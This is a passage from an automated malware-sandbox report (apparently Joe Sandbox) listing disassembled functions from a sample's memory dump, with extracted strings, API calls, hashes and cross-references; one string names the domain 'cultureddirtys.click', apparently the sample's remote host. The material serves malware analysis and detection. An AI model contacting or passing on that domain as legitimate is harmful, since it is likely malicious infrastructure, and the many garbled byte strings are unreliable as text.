
cultureddirtys.click, xrefs: 0040CEF1
^\, xrefs: 0040CD8D
FG, xrefs: 0040CE45
_9Y, xrefs: 0040CE60
#230, xrefs: 0040CDDA

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID: _9Y$#230$FG$cultureddirtys.click$^\
API String ID: 0-1026204680
Opcode ID: 8570ac85f7d954d9c9f08bd09b179bb29108199b095ca0bd970a0471d83dd573
Instruction ID: be0bfa0685a7da2d55774637929e4c4b1729734ddf3faaa17f3e57d2b70ef87b
Opcode Fuzzy Hash: 8570ac85f7d954d9c9f08bd09b179bb29108199b095ca0bd970a0471d83dd573
Instruction Fuzzy Hash: 599102B150D3D18FC7308F6894957EBBBE1EBD6300F184A6DC4C99B292D7798846CB86

Function 0041C04E Relevance: 6.5, Strings: 5, Instructions: 256COMMON

Download Yara Rule

Strings

x~, xrefs: 0041C0D1
(LmB, xrefs: 0041C0B9
pQv, xrefs: 0041C0E1
|r, xrefs: 0041C0D9
;T"J, xrefs: 0041C196

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID: (LmB$;T"J$pQv$x~$|r
API String ID: 0-2583321700
Opcode ID: 7b864c6aae007784629b65dd6e7eacb42c58df5e12a028910d3953efeabdbc85
Instruction ID: f0017da262b89747ca0cff466f1857eea50eb127e1dd4b5b3c6b3bc208b63379
Opcode Fuzzy Hash: 7b864c6aae007784629b65dd6e7eacb42c58df5e12a028910d3953efeabdbc85
Instruction Fuzzy Hash: EB7154B5A4C3118BD704CF66CC9126BB7E2AFD6304F18886EE5C08B385E638D945CB4B

Function 004190C0 Relevance: 6.2, APIs: 2, Strings: 1, Instructions: 906COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 00419527
FreeLibrary.KERNEL32(?), ref: 00419569

Part of subcall function 0043EF30: LdrInitializeThunk.NTDLL(00441CF0,?,00000018,?,?,00000018,?,?,?), ref: 0043EF5E

Strings

OL, xrefs: 0041942F

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID: FreeLibrary$InitializeThunk
String ID: OL
API String ID: 764372645-1230130318
Opcode ID: e7b3f23fd9f129034ea419355190146c35f97e9ebf0f35e15bd5a3bf3c9f86c7
Instruction ID: 2921dfb3648eadb1fb5a2bd0f422dbd156896aa213f1334e34c69986e783137d
Opcode Fuzzy Hash: e7b3f23fd9f129034ea419355190146c35f97e9ebf0f35e15bd5a3bf3c9f86c7
Instruction Fuzzy Hash: AD622874608340ABE7148F25DCA0BABB7D2EFC5314F29862DE4D5573E1D338AC958B4A

Function 0043DA00 Relevance: 5.7, Strings: 4, Instructions: 671COMMON

Download Yara Rule

Strings

f, xrefs: 0043DC1C
S"(w, xrefs: 0043DAB0
C@@F, xrefs: 0043DB54
S"(w, xrefs: 0043DD14

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID: InitializeThunk
String ID: C@@F$S"(w$S"(w$f
API String ID: 2994545307-951073959
Opcode ID: 13429046e819fe00b5a247e5134bf8e1a49da05aae35e2d4abce8e2c1907e5c7
Instruction ID: ab3858e7faeb87dd15824850e8a841b67236376ab17a29e09e546ceb0bf8f4f3
Opcode Fuzzy Hash: 13429046e819fe00b5a247e5134bf8e1a49da05aae35e2d4abce8e2c1907e5c7
Instruction Fuzzy Hash: B232F471A093519FC724CF29D88061BBBE1ABC9314F199A2EF8A5873D1D774EC05CB86

Function 00429374 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 0042946F
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00429572

Strings

L(B, xrefs: 004293AC

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: L(B
API String ID: 237503144-2538666948
Opcode ID: bba0173f18c7919e26010ccb7f5302b0829f2fc74b18e853c1c27d981b4fca87
Instruction ID: 5089139378cce42d4bca66f2117e6992a67c1d470447ec800a7f4af1c2198a72
Opcode Fuzzy Hash: bba0173f18c7919e26010ccb7f5302b0829f2fc74b18e853c1c27d981b4fca87
Instruction Fuzzy Hash: EF8123B6A183109FD314DF64D84076BB7E1EBC5300F45893DE99497395EB78EC428B86

Function 00424A40 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 216COMMON

Download Yara Rule

Strings

z`gf, xrefs: 00424A65
2JB, xrefs: 00424A27

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID: 2JB$z`gf
API String ID: 0-4132974888
Opcode ID: 65d86abc0e24293b913f9ed6221dbdbd12f9cef3da82b62195cc45a6b8c2e634
Instruction ID: 3783604cee78ff1ebcab31f7680652aef326075228794581e063b6509aad2af3
Opcode Fuzzy Hash: 65d86abc0e24293b913f9ed6221dbdbd12f9cef3da82b62195cc45a6b8c2e634
Instruction Fuzzy Hash: D951057120C3409BE324CF68EC41BEBB7E1EBC6314F10497DF69987281D7B994068B96

Function 00421290 Relevance: 5.5, Strings: 4, Instructions: 459COMMON

Download Yara Rule

Strings

GDEJ, xrefs: 004213AD
#`af, xrefs: 0042142D
y/, xrefs: 004216D1
tyy~, xrefs: 0042148D

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID: #`af$GDEJ$tyy~$y/
API String ID: 0-1018404746
Opcode ID: eb34c8398df95aa2b667f457be915dfb5064699668c929a9d115f6003ce403de
Instruction ID: a44d1e5486a3d4f0f470752214a74be919ce51612e42c25dc9d10f1c1679759e
Opcode Fuzzy Hash: eb34c8398df95aa2b667f457be915dfb5064699668c929a9d115f6003ce403de
Instruction Fuzzy Hash: C2E102716083508FC724DF68D891A6BBBF1EFD5314F04882EE9968B391E778E805CB56

Function 00427D90 Relevance: 5.3, Strings: 4, Instructions: 255COMMON

Download Yara Rule

Strings

4., xrefs: 00428574
./, xrefs: 00428730
<G, xrefs: 00428569
"#, xrefs: 0042857F

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID: "#$./$4.$<G
API String ID: 0-297906750
Opcode ID: 04b2b48e7ce9c77c9e4e8abf10a1b664874e8fdcf5240be40adf13479abe39b9
Instruction ID: d3e774dd982b0f0a7d135b27205e798afb8bdb41bd649d6984aa11880ad8d42d
Opcode Fuzzy Hash: 04b2b48e7ce9c77c9e4e8abf10a1b664874e8fdcf5240be40adf13479abe39b9
Instruction Fuzzy Hash: 728115B6A1D3908BD3308F24D8417ABB6B1FFD2304F44592DE4C89B355EB788945875B

Function 0040E158 Relevance: 5.1, Strings: 4, Instructions: 140COMMON

Download Yara Rule

Strings

`C}, xrefs: 0040E17A
D, xrefs: 0040E3AC
Vw'q, xrefs: 0040E192
Jc]], xrefs: 0040E2B8

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID: D$Jc]]$Vw'q$`C}
API String ID: 0-3592151173
Opcode ID: 2f204a7c25fa17a035015cbf3063fb4c547d52e5e3e9bcec3ca731518ccee344
Instruction ID: 80fec91d28a02620f52b89747ee1bc21499922621add6e12ceeb047b7f690585
Opcode Fuzzy Hash: 2f204a7c25fa17a035015cbf3063fb4c547d52e5e3e9bcec3ca731518ccee344
Instruction Fuzzy Hash: 525112B45083848AE3348F51C8A575BBBF1FF92748F14881CE6D96B394C7B98449CF46

Function 00427F95 Relevance: 4.3, Strings: 3, Instructions: 520COMMON

Download Yara Rule

Strings

8~9*, xrefs: 004283EB
./, xrefs: 00428730
&//%, xrefs: 004283CB

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID: &//%$./$8~9*
API String ID: 0-1900518885
Opcode ID: d251255226fed3a2bbaf018731607024951e33a62e39a53fe2014d2b3a856639
Instruction ID: 7e828cff6f1866cb6ceafffe31b0a9e734eff1e2ebeadeab8fd10560032b6d28
Opcode Fuzzy Hash: d251255226fed3a2bbaf018731607024951e33a62e39a53fe2014d2b3a856639
Instruction Fuzzy Hash: C0F114B560C3918FC7108F24E89126FB7E1EF86304F48487EE8C597352DB39E9468B56

Function 0040AF10 Relevance: 4.2, Strings: 3, Instructions: 497COMMON

Download Yara Rule

Strings

`W`Q, xrefs: 0040B048
k[dU, xrefs: 0040B03E
C{Tu, xrefs: 0040B08E

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID: C{Tu$`W`Q$k[dU
API String ID: 0-2853931809
Opcode ID: 9fade3dc6d3f69c14709735b4eb87b70a9edbbd03f498eb7c730186ee3d4522b
Instruction ID: 8d5332dc80a962bbfe09d2b1709603d92ffdbaac0a9cb6c207c614a35ed25dcd
Opcode Fuzzy Hash: 9fade3dc6d3f69c14709735b4eb87b70a9edbbd03f498eb7c730186ee3d4522b
Instruction Fuzzy Hash: 4F1298B9200B00CFD7248F25D891BA7BBF5FB46314F048A2DE5AA8BB91D778A405CF55

Function 004095F0 Relevance: 4.1, Strings: 3, Instructions: 393COMMON

Download Yara Rule

Strings

#, xrefs: 004099D5
2D69C26FE306D42DBC3F28D12F61E48B, xrefs: 0040968C
#, xrefs: 00409A75, 0040985D, 00409800

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID: #$#$2D69C26FE306D42DBC3F28D12F61E48B
API String ID: 0-3949052905
Opcode ID: eb123670cfe2356f5c9b7d50deb5c900c88ad470cbcc8e02cde2a012f66dc941
Instruction ID: d2c3a75e3e13cec461adec4937d8dfa8a09ae57b96e8792ae721715be1112e59
Opcode Fuzzy Hash: eb123670cfe2356f5c9b7d50deb5c900c88ad470cbcc8e02cde2a012f66dc941
Instruction Fuzzy Hash: 83C15972B087404BD318CF35885166BBBE6EFD5314F18893DE5E59B382D638C906CB86

Function 0040AA70 Relevance: 4.1, Strings: 3, Instructions: 383COMMON

Download Yara Rule

Strings

H, xrefs: 0040AE57
A, xrefs: 0040AA95
1;9=, xrefs: 0040AA89

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID: 1;9=$A$H
API String ID: 0-721592554
Opcode ID: 4bc7f390f73922318371c0e4a299c528f4a6c2b82fdd5cb30266293248720e71
Instruction ID: 7a4237af44a0ae105f6d3f018af1c291b523e1a2260fa316319f0a43e075367d
Opcode Fuzzy Hash: 4bc7f390f73922318371c0e4a299c528f4a6c2b82fdd5cb30266293248720e71
Instruction Fuzzy Hash: 10B1F57168C3914BD314CF28949126FBBE2EBC2314F18993DE4E56B781D739C90A8B87

Function 00411507 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 625COMMON

Download Yara Rule

Strings

As<V, xrefs: 00411549

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID: As<V
API String ID: 0-2778774387
Opcode ID: 51b95f6f9e7c7d6584e6c93e3edfbfd48b37412cc392697d5226b142e76c4062
Instruction ID: 770a1a868b74db578ff128ba571692d3a5ceb2514abfc68fb9e4d3c288c02c02
Opcode Fuzzy Hash: 51b95f6f9e7c7d6584e6c93e3edfbfd48b37412cc392697d5226b142e76c4062
Instruction Fuzzy Hash: A7322975A04B408FD714DF38C985396BBE2AF95310F188A3ED5EA873D1E638E845CB46

Function 0042D4E0 Relevance: 4.1, Strings: 3, Instructions: 372COMMON

Download Yara Rule

Strings

2+)E, xrefs: 0042D6ED
>811, xrefs: 0042D6E6
);02, xrefs: 0042D6F4

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID: );02$2+)E$>811
API String ID: 0-1216679826
Opcode ID: 517b75604a2ab78f69a80f283479f54c4d28ada67fb53a22893818abcbf77ab7
Instruction ID: 895a1d6095f4adbd9659d21989b613ed85b61945608e74aa1ccb024d85546fc6
Opcode Fuzzy Hash: 517b75604a2ab78f69a80f283479f54c4d28ada67fb53a22893818abcbf77ab7
Instruction Fuzzy Hash: 86D19DB4900B419BD324EF39C5567A3BFF1AB46300F144A2ED4EB4B786E7346049CB96

Function 00426E50 Relevance: 4.1, Strings: 3, Instructions: 339COMMON

Download Yara Rule

Strings

S+P%, xrefs: 00427179
&', xrefs: 00427181
{/I), xrefs: 00427171

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID: &'$S+P%${/I)
API String ID: 0-651705516
Opcode ID: c586df6937c7497ae987251f12a17f44eb6b469253912f9a2e95eec746e354b2
Instruction ID: 53ab21980dad4e9de9e7434d17dea19c69fe8dc141d63f46f3eecfe4ee9f73c3
Opcode Fuzzy Hash: c586df6937c7497ae987251f12a17f44eb6b469253912f9a2e95eec746e354b2
Instruction Fuzzy Hash: 63A17C72A183218BC314CF28D89126BB7E1FFD1314F198A2DE8C99B385E7789905C7C5

Function 00418927 Relevance: 4.1, Strings: 3, Instructions: 327COMMON

Download Yara Rule

Strings

tw, xrefs: 004189AF
J], xrefs: 004189A1
sG, xrefs: 004189A8

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID: J]$sG$tw
API String ID: 0-669861854
Opcode ID: c5ebd8142ae6c4f25f0e20b3b204bf8b71cf083f4e55ce5da69aca37a62cbd33
Instruction ID: c2d2dcb9fa484b7607a35e14c546a9793bafb6900113ea597638cef1f47e385e
Opcode Fuzzy Hash: c5ebd8142ae6c4f25f0e20b3b204bf8b71cf083f4e55ce5da69aca37a62cbd33
Instruction Fuzzy Hash: 41B18CB4605700CFCB28CF24C4E1663BBB1FF56304B29859DD8964F39AE778A846CB95

Function 0041CCF0 Relevance: 4.0, Strings: 3, Instructions: 283COMMON

Download Yara Rule

Strings

R, xrefs: 0041CD88
S, xrefs: 0041CD8D
Q, xrefs: 0041CD83

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID: Q$R$S
API String ID: 0-2159227449
Opcode ID: fa2d0f4803f636711a63f8fa08e82bf40574286d51e486e904df9e5508a482d5
Instruction ID: 85c6e2e90ca5436811f37888b4c5b61135e88fe2c84abc5dc9c63866ef0d9ac9
Opcode Fuzzy Hash: fa2d0f4803f636711a63f8fa08e82bf40574286d51e486e904df9e5508a482d5
Instruction Fuzzy Hash: C491F83365AA904BE318893D5C613AA6E830BD7334F2DC76EE5F5873E5D57888438349

Function 00435B60 Relevance: 4.0, Strings: 3, Instructions: 258COMMON

Download Yara Rule

Strings

S, xrefs: 00435BE3
R, xrefs: 00435BDE
Q, xrefs: 00435BD9

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID: Q$R$S
API String ID: 0-2159227449
Opcode ID: f44e6096533f799f1d6bea911c355f39ced8a316c778cb0647c48618ba167772
Instruction ID: d9fca5815c5003eab0d0b91e92a33108a6f78dbadfc653ce5a1ea5d080195b7b
Opcode Fuzzy Hash: f44e6096533f799f1d6bea911c355f39ced8a316c778cb0647c48618ba167772
Instruction Fuzzy Hash: C8813837749AC04BD3189E7D5C5226ABA830BD7234F2DD77EA5F58B3E1D5B888024305

Function 0041D1A0 Relevance: 4.0, Strings: 3, Instructions: 245COMMON

Download Yara Rule

Strings

Q, xrefs: 0041D214
S, xrefs: 0041D21E
R, xrefs: 0041D219

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID: Q$R$S
API String ID: 0-2159227449
Opcode ID: 129fc2bc189664d90dba538dc882f008c33ccc94a45de0a06dfed904f8fe70a1
Instruction ID: bba496a5372985bba7141437ab195e5bec31f2ea436575223504c60d37d686cd
Opcode Fuzzy Hash: 129fc2bc189664d90dba538dc882f008c33ccc94a45de0a06dfed904f8fe70a1
Instruction Fuzzy Hash: 6D812272B59A904BE728C93C5C512ABBA830BD3230F2DC77EE5B5873E9D57888468345

Function 0042F093 Relevance: 3.9, Strings: 3, Instructions: 145COMMON

Download Yara Rule

Strings

c>&{, xrefs: 0042F6FD
?--p, xrefs: 0042F5C7
+!?+, xrefs: 0042F5C0

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID: +!?+$?--p$c>&{
API String ID: 0-3106190836
Opcode ID: 7a4ff5f8cd27adef4b1ecbf93259f418dd829e203bb99b82b3cee829bc6667ce
Instruction ID: 215c636fbddd9064837e7d5c3cde9a1972559525d02c12aa3c29cf55a2b0a494
Opcode Fuzzy Hash: 7a4ff5f8cd27adef4b1ecbf93259f418dd829e203bb99b82b3cee829bc6667ce
Instruction Fuzzy Hash: 8041E2316047918BD7298F38D490362BBF1FF57300F6896ADC4D29B796D738980ACB55

Function 0042F578 Relevance: 3.9, Strings: 3, Instructions: 142COMMON

Download Yara Rule

Strings

c>&{, xrefs: 0042F6FD
?--p, xrefs: 0042F5C7
+!?+, xrefs: 0042F5C0

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID: +!?+$?--p$c>&{
API String ID: 0-3106190836
Opcode ID: 4042cd04b6e45535a366894970237c2236a786ac552d274631216f560106e037
Instruction ID: bcf31b72bf09cb317ee0e6cbe7a3cd916c9085281e9dee77dce07ef7badb7a1d
Opcode Fuzzy Hash: 4042cd04b6e45535a366894970237c2236a786ac552d274631216f560106e037
Instruction Fuzzy Hash: E14122206087918BD7268F39D490372BBB1FF57310F6896BEC0D29B796D738940ACB19

Function 00404B90 Relevance: 3.3, Strings: 2, Instructions: 792COMMON

Download Yara Rule

Strings

0, xrefs: 004054AB
8, xrefs: 004054A3

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 15f58878d783f1e86fe4544b6f77fb079d1d1bf37b3694ae50e1066ca26427e8
Instruction ID: 699146bfb0d8c33709771ddd8f2e5912583d5bcccba710f65b4bfe4c593fdc54
Opcode Fuzzy Hash: 15f58878d783f1e86fe4544b6f77fb079d1d1bf37b3694ae50e1066ca26427e8
Instruction Fuzzy Hash: 6E721371508340AFD714CF18C884BABBBE1AF88314F54892EF9899B391D379D958CF96

Function 0043B757 Relevance: 3.1, Strings: 2, Instructions: 648COMMON

Download Yara Rule

Strings

^1, xrefs: 0043B966
VW, xrefs: 0043BC6A

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID: VW$^1
API String ID: 0-1829332145
Opcode ID: 8b14f776a0fb695f18afaac2e4628aa68cc99a932581994cca80ac9c1f403b24
Instruction ID: a4a54bef16d968bb56b733710aebb17d2bd9bb77b83521fa0b5e17e64e22ead2
Opcode Fuzzy Hash: 8b14f776a0fb695f18afaac2e4628aa68cc99a932581994cca80ac9c1f403b24
Instruction Fuzzy Hash: 2612243A518311CBDB189F28E85236BB3F1EF9A310F1A887DD98583391E779C945C749

Function 00404260 Relevance: 2.8, Strings: 2, Instructions: 329COMMON

Download Yara Rule

Strings

), xrefs: 004042DB
IEND, xrefs: 00404651

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: ce31f45f53e51b5298a1ba3b0f97aa1870b531dfc6cdfbca1e31f7cbb672a44b
Instruction ID: 51e0701a2f736e0020de5a9d6bdfdf17a4e5eeb61dfeb23137a348e058160d31
Opcode Fuzzy Hash: ce31f45f53e51b5298a1ba3b0f97aa1870b531dfc6cdfbca1e31f7cbb672a44b
Instruction Fuzzy Hash: C9D1AFB1A083449FD710DF14D84575BBBE0ABD5308F14482EFA99AB3C2D779E908CB96

Function 0041C4E0 Relevance: 2.8, Strings: 2, Instructions: 319COMMON

Download Yara Rule

Strings

vwpq, xrefs: 0041C668
r, xrefs: 0041C625

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID: r$vwpq
API String ID: 0-3569237348
Opcode ID: 22b5811a6288ad6580e0aa62d86da1741da121e3d4624062027b4ad0eecdf520
Instruction ID: 34f1bbe08903e6f2d7644d1420bcd52760caa19c4d9134696cbfe5875449ea24
Opcode Fuzzy Hash: 22b5811a6288ad6580e0aa62d86da1741da121e3d4624062027b4ad0eecdf520
Instruction Fuzzy Hash: 29A117316482614FD7118F288C903ABBBD1AB91314F18863EE8E9C73C2D778DC46D795

Function 00408F70 Relevance: 2.8, Strings: 2, Instructions: 251COMMON

Download Yara Rule

Strings

V, xrefs: 00409056
fx|z, xrefs: 00408FD1

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID: V$fx|z
API String ID: 0-681704546
Opcode ID: 2cc85b762e328624723c7d7e73bb91e246728c3a78d4e4d6140cd0999c726c93
Instruction ID: 80abed0833860db98ab23282628cbea41a4a846c6c6a204caba2e915d68c0275
Opcode Fuzzy Hash: 2cc85b762e328624723c7d7e73bb91e246728c3a78d4e4d6140cd0999c726c93
Instruction Fuzzy Hash: 8D51E32068C3C68AD3118F3994A076BFFE09FA7300F1C556EE4D45B383D2798A19D76A

Function 0043AE30 Relevance: 2.7, Strings: 2, Instructions: 221COMMON

Download Yara Rule

Strings

NP,?, xrefs: 0043AF60
NP,?, xrefs: 0043AFB0

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID: NP,?$NP,?
API String ID: 0-4096726916
Opcode ID: 0ccd81dbf167557dd91610d05510ded85e2f869ad8ccd5491cfbff5956cbc37d
Instruction ID: 48dbf01d005bef2233451d70d6476307289bbc23adf1b6d952bfcf170c6ed0f1
Opcode Fuzzy Hash: 0ccd81dbf167557dd91610d05510ded85e2f869ad8ccd5491cfbff5956cbc37d
Instruction Fuzzy Hash: EA51F4B5284200EFE3149F29EC42A3B7365EB49359F29563DF1C4861E1E738AC31DB5A

Function 0041A280 Relevance: 2.7, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

0, xrefs: 0041A5D7
L@N/, xrefs: 0041A288

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID: 0$L@N/
API String ID: 0-3851033181
Opcode ID: f232763a1fe003d9fe3d5958c568e47221dcd94f65dac604dd2efa7f54bf0f70
Instruction ID: 26f02b1c58bead0d480d1d074c86c88df01acdeab459f6cbac17582f84703378
Opcode Fuzzy Hash: f232763a1fe003d9fe3d5958c568e47221dcd94f65dac604dd2efa7f54bf0f70
Instruction Fuzzy Hash: E3418032A0A65047D3288A2884553FBFBE29FD3324F2CD56FD4E28B3D1C67D88458796

Function 00414F34 Relevance: 1.8, Strings: 1, Instructions: 558COMMON

Download Yara Rule

Strings

gfff, xrefs: 004150E2

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID: gfff
API String ID: 0-1553575800
Opcode ID: dcea9bafbe767d262a06a381ba1d5f444f1c6d9a53b3f9213c4a045178cfd65d
Instruction ID: 624a34a7a89ed849047c046f419393cac8e99605f5e9fb2c7dc5e37e21c2652a
Opcode Fuzzy Hash: dcea9bafbe767d262a06a381ba1d5f444f1c6d9a53b3f9213c4a045178cfd65d
Instruction Fuzzy Hash: D5F14975200B01DFD3158F28DC517A6B7E2FF86324F59866AE4928B3E1D738A892CB44

Function 00414812 Relevance: 1.8, Strings: 1, Instructions: 543COMMON

Download Yara Rule

Strings

NP,?, xrefs: 00414880

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID: NP,?
API String ID: 0-3110377521
Opcode ID: 1fc4cc8043242c78b92c4f1807013de54347a9bd100f12d0bc5b1819303af8e2
Instruction ID: ed71476df50380b23ef9a1f47a3a6fd47854f8aedf13eb07153379707c2d5930
Opcode Fuzzy Hash: 1fc4cc8043242c78b92c4f1807013de54347a9bd100f12d0bc5b1819303af8e2
Instruction Fuzzy Hash: 7EF135B8608200DFD7149F24FC41B2B73A2FB8A369F16463DF594472E1E735AC658B4A

Function 004217C0 Relevance: 1.7, Strings: 1, Instructions: 453COMMON

Download Yara Rule

Strings

%", xrefs: 004217EC

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID: %"
API String ID: 0-2085258236
